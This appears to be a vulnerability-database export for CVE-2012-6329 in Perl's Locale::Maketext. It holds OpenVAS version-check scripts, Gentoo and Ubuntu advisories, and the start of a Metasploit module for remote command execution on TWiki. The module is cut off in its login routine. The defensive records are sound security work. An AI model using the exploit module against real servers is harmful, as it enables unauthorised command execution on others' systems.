script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC17\");\n script_tag(name:\"affected\", value:\"perl on Fedora 17\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"perl\", 
rpm:\"perl~5.14.3~221.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-23T19:06:08", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6329"], "description": "The host is installed with Strawberry Perl and is prone to multiple code\n injection vulnerabilities.", "modified": "2020-04-21T00:00:00", "published": "2013-01-24T00:00:00", "id": "OPENVAS:1361412562310803162", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803162", "type": "openvas", "title": "Strawberry Perl Locale::Maketext Module Multiple Code Injection Vulnerabilities (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Strawberry Perl Locale::Maketext Module Multiple Code Injection Vulnerabilities (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803162\");\n script_version(\"2020-04-21T11:03:03+0000\");\n script_cve_id(\"CVE-2012-6329\");\n script_bugtraq_id(56852);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-04-21 11:03:03 +0000 (Tue, 21 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2013-01-24 12:42:04 +0530 (Thu, 24 Jan 2013)\");\n script_name(\"Strawberry Perl Locale::Maketext Module Multiple Code Injection Vulnerabilities (Windows)\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/51498\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/80566\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_perl_detect_win.nasl\");\n script_mandatory_keys(\"Strawberry/Perl/Ver\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to execute arbitrary code on\n the system.\");\n script_tag(name:\"affected\", value:\"Strawberry Perl version prior to 5.17.7 on Windows\");\n script_tag(name:\"insight\", value:\"An improper validation of input by the '_compile()' function which can be\n exploited to inject and execute arbitrary Perl code on the system.\");\n script_tag(name:\"solution\", value:\"Upgrade to Strawberry Perl version 5.17.7 or later.\");\n script_tag(name:\"summary\", value:\"The host is installed with Strawberry Perl and is prone to multiple code\n injection 
vulnerabilities.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://strawberryperl.com\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nspVer = get_kb_item(\"Strawberry/Perl/Ver\");\nif(spVer)\n{\n if(version_is_less(version:spVer, test_version:\"5.17.7\"))\n {\n report = report_fixed_ver(installed_version:spVer, fixed_version:\"5.17.7\");\n security_message(port: 0, data: report);\n exit(0);\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-01-24T11:10:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6329"], "description": "Check for the Version of perl", "modified": "2018-01-24T00:00:00", "published": "2013-01-31T00:00:00", "id": "OPENVAS:865275", "href": "http://plugins.openvas.org/nasl.php?oid=865275", "type": "openvas", "title": "Fedora Update for perl FEDORA-2013-0659", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for perl FEDORA-2013-0659\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Perl is a high-level programming language with roots in C, sed, awk and shell\n scripting. Perl is good at handling processes and files, and is especially\n good at handling text. Perl's hallmarks are practicality and efficiency.\n While it is used to do a lot of different things, Perl's most common\n applications are system administration utilities and web programming. A large\n proportion of the CGI scripts on the web are written in Perl. You need the\n perl package installed on your system so that your system can handle Perl\n scripts.\n\n Install this package if you want to program in Perl or enable your system to\n handle Perl scripts.\";\n\n\ntag_solution = \"Please Install the Updated Packages.\";\ntag_affected = \"perl on Fedora 18\";\n\n\n\n\nif(description)\n{\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2013-January/097811.html\");\n script_id(865275);\n script_version(\"$Revision: 8509 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-24 07:57:46 +0100 (Wed, 24 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-31 09:25:13 +0530 (Thu, 31 Jan 2013)\");\n script_cve_id(\"CVE-2012-6329\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", 
value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2013-0659\");\n script_name(\"Fedora Update for perl FEDORA-2013-0659\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of perl\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"perl\", rpm:\"perl~5.16.2~237.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-02-06T13:09:40", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6329"], "description": "Check for the Version of perl", "modified": "2018-02-05T00:00:00", "published": "2013-02-22T00:00:00", "id": "OPENVAS:865373", "href": "http://plugins.openvas.org/nasl.php?oid=865373", "type": "openvas", "title": "Fedora Update for perl FEDORA-2013-1836", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for perl FEDORA-2013-1836\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# 
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Perl is a high-level programming language with roots in C, sed, awk and shell\n scripting. Perl is good at handling processes and files, and is especially\n good at handling text. Perl's hallmarks are practicality and efficiency.\n While it is used to do a lot of different things, Perl's most common\n applications are system administration utilities and web programming. A large\n proportion of the CGI scripts on the web are written in Perl. You need the\n perl package installed on your system so that your system can handle Perl\n scripts.\n\n Install this package if you want to program in Perl or enable your system to\n handle Perl scripts.\";\n\n\ntag_affected = \"perl on Fedora 17\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2013-February/098991.html\");\n script_id(865373);\n script_version(\"$Revision: 8672 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-02-05 17:39:18 +0100 (Mon, 05 Feb 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-02-22 09:59:33 +0530 (Fri, 22 Feb 2013)\");\n script_cve_id(\"CVE-2012-6329\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2013-1836\");\n script_name(\"Fedora Update for perl FEDORA-2013-1836\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of perl\");\n 
script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"perl\", rpm:\"perl~5.14.3~221.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2020-04-23T19:06:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6329"], "description": "The host is installed with Active Perl and is prone to multiple\n code injection vulnerabilities.", "modified": "2020-04-21T00:00:00", "published": "2013-01-24T00:00:00", "id": "OPENVAS:1361412562310803339", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803339", "type": "openvas", "title": "Active Perl Locale::Maketext Module Multiple Code Injection Vulnerabilities (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Active Perl Locale::Maketext Module Multiple Code Injection Vulnerabilities (Windows)\n#\n# Authors:\n# Arun kallavi <karun@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms 
of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to execute arbitrary code on\n the system.\");\n script_tag(name:\"affected\", value:\"Active Perl version prior to 5.17.7 on Windows\");\n script_tag(name:\"insight\", value:\"An improper validation of input by the '_compile()' function which can be\n exploited to inject and execute arbitrary Perl code on the system.\");\n script_tag(name:\"solution\", value:\"Upgrade to Active Perl version 5.17.7 or later.\");\n script_tag(name:\"summary\", value:\"The host is installed with Active Perl and is prone to multiple\n code injection vulnerabilities.\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.803339\");\n script_version(\"2020-04-21T11:03:03+0000\");\n script_cve_id(\"CVE-2012-6329\");\n script_bugtraq_id(56852);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-04-21 11:03:03 +0000 (Tue, 21 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2013-01-24 12:42:04 +0530 (Thu, 24 Jan 2013)\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_name(\"Active Perl Locale::Maketext Module Multiple Code Injection 
Vulnerabilities (Windows)\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/51498\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/80566\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_perl_detect_win.nasl\");\n script_mandatory_keys(\"ActivePerl/Ver\");\n script_xref(name:\"URL\", value:\"http://www.perl.org/get.html\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\napVer = get_kb_item(\"ActivePerl/Ver\");\nif(apVer)\n{\n if(version_is_less(version:apVer, test_version:\"5.17.7\"))\n {\n report = report_fixed_ver(installed_version:apVer, fixed_version:\"5.17.7\");\n security_message(port: 0, data: report);\n exit(0);\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-02T21:11:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6329"], "description": "The host is installed with Strawberry Perl and is prone to multiple code\n injection vulnerabilities.", "modified": "2017-05-05T00:00:00", "published": "2013-01-24T00:00:00", "id": "OPENVAS:803162", "href": "http://plugins.openvas.org/nasl.php?oid=803162", "type": "openvas", "title": "Strawberry Perl Locale::Maketext Module Multiple Code Injection Vulnerabilities (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_perl_maketext_mult_code_inje_vuln_win.nasl 6074 2017-05-05 09:03:14Z teissa $\n#\n# Strawberry Perl Locale::Maketext Module Multiple Code Injection Vulnerabilities (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free 
Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will allow attackers to execute arbitrary code on\n the system.\n Impact Level: System/Application\";\n\ntag_affected = \"Strawberry Perl version prior to 5.17.7 on Windows\";\ntag_insight = \"An improper validation of input by the '_compile()' function which can be\n exploited to inject and execute arbitrary Perl code on the system.\";\ntag_solution = \"Upgrade to Strawberry Perl version 5.17.7 or later,\n For updates refer to http://strawberryperl.com\";\ntag_summary = \"The host is installed with Strawberry Perl and is prone to multiple code\n injection vulnerabilities.\";\n\nif(description)\n{\n script_id(803162);\n script_version(\"$Revision: 6074 $\");\n script_cve_id(\"CVE-2012-6329\");\n script_bugtraq_id(56852);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-05-05 11:03:14 +0200 (Fri, 05 May 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-24 12:42:04 +0530 (Thu, 24 Jan 2013)\");\n script_name(\"Strawberry Perl Locale::Maketext Module Multiple Code Injection Vulnerabilities (Windows)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/51498\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/80566\");\n script_category(ACT_GATHER_INFO);\n 
script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_perl_detect_win.nasl\");\n script_mandatory_keys(\"Strawberry/Perl/Ver\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\n## Variable Initialization\nspVer = \"\";\n\n## Get version from KB\nspVer = get_kb_item(\"Strawberry/Perl/Ver\");\nif(spVer)\n{\n if(version_is_less(version:spVer, test_version:\"5.17.7\"))\n {\n security_message(0);\n exit(0);\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:37:19", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6329"], "description": "The remote host is missing an update for the 'perl' package(s) announced via the referenced advisory.", "modified": "2019-03-13T00:00:00", "published": "2014-02-11T00:00:00", "id": "OPENVAS:1361412562310841704", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841704", "type": "openvas", "title": "Ubuntu Update for perl USN-2099-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_2099_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for perl USN-2099-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed 
in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.841704\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-02-11 10:44:48 +0530 (Tue, 11 Feb 2014)\");\n script_cve_id(\"CVE-2012-6329\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Ubuntu Update for perl USN-2099-1\");\n\n script_tag(name:\"affected\", value:\"perl on Ubuntu 12.10,\n Ubuntu 12.04 LTS,\n Ubuntu 10.04 LTS\");\n script_tag(name:\"insight\", value:\"It was discovered that Perl's Locale::Maketext module\nincorrectly handled backslashes and fully qualified method names. 
An attacker\ncould possibly use this flaw to execute arbitrary code when an application used\nuntrusted templates.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"USN\", value:\"2099-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2099-1/\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'perl'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(12\\.04 LTS|10\\.04 LTS|12\\.10)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"perl-modules\", ver:\"5.14.2-6ubuntu2.4\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"perl-modules\", ver:\"5.10.1-8ubuntu2.4\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"perl-modules\", ver:\"5.14.2-13ubuntu0.3\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:43", "bulletinFamily": "unix", "cvelist": ["CVE-2012-6329"], 
"edition": 1, "description": "### Background\n\nLocale-Maketext - Perl framework for localization\n\n### Description\n\nTwo vulnerabilities have been reported in the Locale-Maketext module for Perl, which can be exploited by malicious users to compromise an application using the module. \n\nThe vulnerabilities are caused due to the \u201c_compile()\u201d function not properly sanitising input, which can be exploited to inject and execute arbitrary Perl code. \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the process, or cause a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll users of the Locale-Maketext module should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=perl-core/Locale-Maketext-1.230.0\"", "modified": "2014-12-29T00:00:00", "published": "2014-10-12T00:00:00", "id": "GLSA-201410-02", "href": "https://security.gentoo.org/glsa/201410-02", "type": "gentoo", "title": "Perl, Perl Locale-Maketext module: Multiple vulnerabilities", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "ubuntu": [{"lastseen": "2020-07-02T11:37:10", "bulletinFamily": "unix", "cvelist": ["CVE-2012-6329"], "description": "It was discovered that Perl's Locale::Maketext module incorrectly handled \nbackslashes and fully qualified method names. An attacker could possibly \nuse this flaw to execute arbitrary code when an application used untrusted \ntemplates.", "edition": 5, "modified": "2014-02-05T00:00:00", "published": "2014-02-05T00:00:00", "id": "USN-2099-1", "href": "https://ubuntu.com/security/notices/USN-2099-1", "title": "Perl vulnerability", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-02T21:18:49", "description": "TWiki MAKETEXT Remote Command Execution. CVE-2012-6329. 
Remote exploit for unix platform", "published": "2012-12-23T00:00:00", "type": "exploitdb", "title": "TWiki MAKETEXT Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-6329"], "modified": "2012-12-23T00:00:00", "id": "EDB-ID:23579", "href": "https://www.exploit-db.com/exploits/23579/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = ExcellentRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'TWiki MAKETEXT Remote Command Execution',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a vulnerability in the MAKETEXT Twiki variable. By using a\r\n\t\t\t\tspecially crafted MAKETEXT, a malicious user can execute shell commands since user\r\n\t\t\t\tinput is passed to the Perl \"eval\" command without first being sanitized. The\r\n\t\t\t\tproblem is caused by an underlying security issue in the CPAN:Locale::Maketext\r\n\t\t\t\tmodule. This works in TWiki sites that have user interface localization enabled\r\n\t\t\t\t(UserInterfaceInternationalisation variable set).\r\n\r\n\t\t\t\tIf USERNAME and PASSWORD aren't provided, anonymous access will be tried. Also,\r\n\t\t\t\tif the 'TwikiPage' option isn't provided, the module will try to create a random\r\n\t\t\t\tpage on the SandBox space. 
The modules has been tested successfully on\r\n\t\t\t\tTWiki 5.1.2 as distributed with the official TWiki-VM-5.1.2-1 virtual machine.\r\n\t\t\t},\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'George Clark', # original discovery\r\n\t\t\t\t\t'juan vazquez' # Metasploit module\r\n\t\t\t\t],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2012-6329' ],\r\n\t\t\t\t\t[ 'OSVDB', '88460' ],\r\n\t\t\t\t\t[ 'BID', '56950' ],\r\n\t\t\t\t\t[ 'URL', 'http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2012-6329' ]\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false, # web server context\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t\t'Compat' =>\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'PayloadType' => 'cmd',\r\n\t\t\t\t\t\t\t'RequiredCmd' => 'generic ruby python bash telnet'\r\n\t\t\t\t\t\t}\r\n\t\t\t\t},\r\n\t\t\t'Platform' => [ 'unix' ],\r\n\t\t\t'Arch' => ARCH_CMD,\r\n\t\t\t'Targets' => [[ 'Automatic', { }]],\r\n\t\t\t'DisclosureDate' => 'Dec 15 2012',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('TARGETURI', [ true, \"TWiki base path\", \"/\" ]),\r\n\t\t\t\tOptString.new('TwikiPage', [ false, \"TWiki Page with edit permissions to inject the payload, by default random Page on Sandbox (Ex: /Sandbox/MsfTest)\" ]),\r\n\t\t\t\tOptString.new('USERNAME', [ false, \"The user to authenticate as (anonymous if username not provided)\"]),\r\n\t\t\t\tOptString.new('PASSWORD', [ false, \"The password to authenticate with (anonymous if password not provided)\" ])\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef do_login(username, password)\r\n\t\tres = send_request_cgi({\r\n\t\t\t'method' => 'POST',\r\n\t\t\t'uri' => \"#{@base}do/login\",\r\n\t\t\t'vars_post' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'username' => username,\r\n\t\t\t\t\t'password' => password\r\n\t\t\t\t}\r\n\t\t\t})\r\n\r\n\t\tif not res or res.code != 302 or 
